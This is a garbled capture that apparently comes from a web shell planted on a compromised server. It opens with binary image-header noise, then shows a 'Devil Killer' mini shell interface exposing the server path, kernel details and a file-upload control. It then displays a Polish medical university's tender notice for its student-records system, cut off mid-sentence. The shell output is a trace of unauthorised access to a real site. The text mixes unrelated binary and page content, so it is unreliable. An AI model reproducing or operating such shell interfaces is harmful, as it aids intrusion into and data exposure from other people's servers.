JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240704/0039774001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> TPm-58/24 rozwój, modyfikacja i rozbudowa<br/>oraz serwis informatycznego <br/>Systemu Obsługi Toku Studiów <br/>wraz z integracją z systemami Zamawiającego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Medyczny im. Karola Marcinkowskiego w Poznaniu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">DZP UMP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288811</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Fredry 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-701</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@ump.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ump.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> TPm-58/24 rozwój, modyfikacja i rozbudowa<br/>oraz serwis informatycznego <br/>Systemu Obsługi Toku Studiów <br/>wraz z integracją z systemami Zamawiającego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0509bad6-39f1-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00397740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ump <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ump</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu o<br/>udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). W przedmiotowym<br/>postępowaniu komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy<br/>zakupowej (https://platformazakupowa.pl/pn/ump).<br/>2. W sytuacjach awaryjnych np. w przypadku braku działania platformy zakupowej<br/>https://platformazakupowa.pl/pn/ump Zamawiający może również komunikować się z Wykonawcami<br/>za pomocą poczty elektronicznej, z wyłączeniem składania ofert, które odbywa się poprzez platformę<br/>zakupową.<br/>3. Dokumenty elektroniczne, oświadczenia, elektroniczne kopie dokumentów lub oświadczeń, o których<br/>mowa w niniejszej SWZ, składane są przez Wykonawcę za pośrednictwem<br/>https://platformazakupowa.pl/pn/ump.<br/>4. Sposób sporządzenia dokumentów elektronicznych, oświadczeń, elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz w rozporządzeniu<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy<br/>(Dz. U. z 2020 r. poz. 2415 z późn. zm.).<br/>5. Wymagania techniczne:<br/>1) Minimalne wymagania techniczne umożliwiające korzystanie ze Strony platformazakupowa.pl to<br/>przeglądarka internetowa Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą<br/>języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości, co<br/>najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości<br/>ekranu 1024x768 pikseli.<br/>2) Oferta lub wniosek powinny być sporządzone w języku polskim, z zachowaniem postaci<br/>elektronicznej, a do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub<br/>multimedialne stosuje się: .txt; .rtf; .pdf; .xps; .odt; .ods; .odp; .doc; .xls; .ppt; .docx; .xlsx;<br/>.pptx; .csv, xml.<br/>Zamawiający dopuszcza formaty.zip i 7z, które mogą zawierać jedynie pliki o wyżej wymienionych<br/>formatach. Zamawiający zaleca stosowanie formatu pdf.<br/>3) Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia<br/>16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz.U. z 2022 r. poz. 1233), które<br/>Wykonawca zastrzeże, jako tajemnicę przedsiębiorstwa, powinny zostać umieszczone w osobnym<br/>polu (w kroku pierwszym składania oferty) przeznaczonym na zamieszczenie tajemnicy<br/>przedsiębiorstwa. Zamawiający wymaga, aby każda informacja stanowiąca tajemnicę<br/>przedsiębiorstwa była zamieszczona w wydzielonym i odpowiednio oznaczonym pliku. Wykonawca<br/>zastrzega i wykazuje, że określone informacje stanowią tajemnicę przedsiębiorstwa wraz z<br/>przekazaniem tych informacji. Wykonawca nie może zastrzec informacji, o których mowa w art. 222<br/>ust. 5 Pzp.<br/>4) W przypadku, gdy dany dokument tylko w części zawiera tajemnicę przedsiębiorstwa, wskazuje się<br/>aby Wykonawca podzielił ten dokument na dwa pliki i dla każdego z nich odpowiednio oznaczył<br/>status jawności, bądź tajemnicy przedsiębiorstwa.<br/>5) W celu sprawnego przeprowadzenia otwarcia ofert Zamawiający wymaga, aby nazwy plików<br/>jednoznacznie określały, w którym z nich znajduje się formularz oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych <br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 ze zm.), dalej „RODO”: <br/>▪ administratorem Pani/Pana danych osobowych jest Uniwersytet Medyczny im. Karola Marcinkowskiego <br/>w Poznaniu, ul. Fredry 10, 61-701 Poznań, tel. (61) 854-60-00, http://ump.edu.pl;<br/>▪ we wszystkich sprawach związanych z przetwarzaniem danych osobowych można kontaktować się z <br/>inspektorem ochrony danych w Uniwersytecie Medycznym za pomocą adresu e-mail: iod@ump.edu.pl<br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z postępowaniem o udzielenie zamówienia publicznego pn. rozwój, modyfikacja i rozbudowa oraz <br/>serwis informatycznego Systemu Obsługi Toku Studiów wraz z integracją z systemami <br/>Zamawiającego numer postępowania TPm-58/24 prowadzonym w trybie podstawowym z możliwością<br/>negocjacji; <br/>▪ odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>▪ Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 <br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>▪ obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest <br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych <br/>wynikają z ustawy Pzp;<br/>▪ w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>▪ posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych <br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-193 <br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących <br/>narusza przepisy RODO;<br/>▪ nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/> * Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub <br/>podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/> ** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o <br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz <br/>nie może naruszać integralności protokołu oraz jego załączników.<br/> *** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu <br/>do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej <br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa <br/>członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TPm-58/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozwój, modyfikacja i rozbudowa oraz serwis informatycznego <br/>Systemu Obsługi Toku Studiów wraz z integracją z systemami Zamawiającego<br/>Szczegółowy opis przedmiotu zamówienia: znajduje się w załączniku nr 3 do SWZ - OPZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72000000-5 - Usługi informatyczne: konsultacyjne, opracowywania oprogramowania, internetowe i wsparcia</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wartość merytoryczna oferty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy nad Systemem Obsługi Toku Studiów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się wykonaniem <br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, co najmniej jednej usługi, która dotyczyła rozbudowy <br/>i wdrożenia informatycznego systemu do obsługi toku studiów o wartości minimum 300 <br/>000 zł brutto, w co najmniej jednej uczelni (szkole wyższej), działającej na podstawie ustawy <br/>z dnia 16.03.2021 r. Prawo o szkolnictwie wyższym i nauce (Dz.U.2021.478).<br/> Ponadto, w ramach ww. usługi: <br/>− Wykonawca wykonał, co najmniej jedno wdrożenie, w którym przeprowadzona została <br/>integracja z systemem klasy ERP;<br/>− Wykonawca wykonał, co najmniej jedno wdrożenie, które zostało zrealizowane <br/>w organizacji o rozproszonej strukturze organizacyjnej zamawiającego przy możliwości <br/>jednoczesnej pracy, minimum 10 000 użytkowników;<br/>− system przeznaczony był do eksploatacji przez, co najmniej 1 200 użytkowników <br/>wewnętrznych oraz zapewniał zarządzanie użytkownikami i ich uprawnieniami;<br/>− Wykonawca wykonał, co najmniej jedno wdrożenie, w którym zintegrowano system z <br/>więcej, niż trzema innymi systemami jednocześnie;<br/>− system posiada możliwość techniczną obsługi, nie mniej, niż 20 000 użytkowników;<br/>− Wykonawca zaprojektował, wykonał i wdrożył portal umożliwiający dostęp <br/>do zasobów systemu za pośrednictwem przeglądarki internetowej.<br/>W przypadku wykazania przez Wykonawcę usługi wykonywanej, jej zrealizowany zakres <br/>musi odpowiadać kwocie minimum 300 000 zł brutto.<br/>b) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował <br/>odpowiednimi osobami, to jest osobami zdolnymi <br/>do wykonania zamówienia o kwalifikacjach zawodowych, doświadczeniu i wykształceniu <br/>odpowiadającym następującym wymogom:<br/>I. Jedna osoba, przewidziana do pełnienia funkcji Kierownik projektu, która:<br/>• posiada wykształcenie wyższe;<br/>• posiada, co najmniej 7-letnie doświadczenie jako kierownik projektu, <br/>w projektach związanych z rozbudową i wdrażaniem systemów informatycznych do <br/>obsługi toku studiów w uczelniach wyższych, napisanych <br/>w języku Python.<br/>II. Dwie osoby przewidziane do pełnienia funkcji programisty:<br/>• posiadają, co najmniej 3-letnie doświadczenie w programowaniu związanym <br/>z wykonaniem i wdrażaniem systemów informatycznych do obsługi toku studiów w <br/>uczelniach wyższych, napisanych w języku Python.<br/>Zamawiający nie dopuszcza pełnienia przez tę samą osobę funkcji Kierownika Projektu <br/>i programisty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający <br/>będzie żądał zgodnie z pkt 19.2 SWZ następujących dokumentów:<br/>1)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności <br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące <br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu <br/>do rejestru lub ewidencji;<br/>2)oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności <br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i <br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo <br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie <br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 SWZ <br/>(nie dotyczy sytuacji, gdy w postępowaniu złożono wyłącznie jedną ofertę);<br/>3)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 <br/>ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o <br/>których mowa w art. 108 ust. 1 pkt 1-6 – składane na wezwanie Zamawiającego;<br/>4)oświadczenia wykonawcy o aktualności oświadczenia złożonego wraz z ofertą <br/>o niepodleganiu wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na <br/>podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa <br/>narodowego – składane na wezwanie Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający <br/>będzie żądał zgodnie z pkt 19.2 SWZ następujących dokumentów:<br/>1) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych <br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami- zgodnie z <br/>załącznikiem nr 5 do SWZ;<br/>2) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również <br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania <br/>i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem <br/>dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym <br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są <br/>wykonywane, jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych <br/>nadal wykonywanych referencje, bądź inne dokumenty potwierdzające ich należyte wykonywanie <br/>powinny być wystawione w okresie ostatnich 3 miesięcy – 